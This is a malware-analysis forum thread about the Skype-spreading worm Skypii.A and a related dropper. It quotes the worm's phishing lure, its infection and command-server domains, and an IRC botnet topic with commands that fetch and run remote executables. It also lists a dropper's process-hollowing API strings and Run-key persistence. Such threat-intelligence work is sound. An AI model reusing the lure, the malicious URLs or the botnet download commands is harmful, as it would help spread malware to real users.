A forum for reverse engineering, OS internals and malware analysis 

Worm:Win32/Skypii.A

Forum for analysis and discussion about malware.

Re: Worm:Win32/Skypii.A

 #18682  by Userbased
 Sun Mar 24, 2013 2:17 pm
Spreading message (for english keyboards) hi, really nice photos of you not? hxxp://ht.ly/jlJuN?photoalbum=skype.name
Expanded url hxxp://cbpm.sp.gov.br/images/fotos/foto.php
Visiting the page downloads photos_24_03_2013_JPE.zip. https://www.virustotal.com/en/file/18ca ... 364133499/
Inside the zip file is photos_24_03_2013_JPE.exe https://www.virustotal.com/en/file/44b9 ... 364133567/
photos_24_03_2013_JPE.exe is ngr/dorkbot, connects to mikimouse.net (Conection info here: http://www.exposedbotnets.com/2013/02/m ... osted.html)
Current channel topic
* Topic for #jobs is: !mdns http://risold.de/images/n.txt !dl http://hotfile.com/dl/199590621/c2677a7/r.exe.html !dl http://hotfile.com/dl/199670502/d727122/fbx2.exe.html
* Topic for #jobs set by h at Sun Mar 24 10:02:13 2013
r.exe is the skype worm
fbx2.exe has an unknown function, but the fbx2 in the name suggests it may attempt to spread on facebook. https://www.virustotal.com/en/file/5b88 ... 364134364/
Attachments
downloads photos_24_03_2013_JPE.zip, r.exe, fbx2.exe
"infected"
(1.1 MiB) Downloaded 49 times

Re: Worm:Win32/Skypii.A

 #18683  by EP_X0FF
 Sun Mar 24, 2013 2:48 pm
fbx2.exe is a muldrop with Trojan:Win32/AgentBypass targetting Chrome and "Resource Hacker".

dropper contains this wonderful piece of crap.
Code: Select all
CreateProcessA,ReadProcessMemory,VirtualAlloc,GetThreadContext,VirtualAllocEx,WriteProcessMemory,SetThreadContext,
ResumeThread,NtUnmapViewOfSection,Kernel32,ntdll,GetModuleFileNameA,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run,1,,
Attachments
pass: malware
(50.02 KiB) Downloaded 41 times
 Return to “Malware”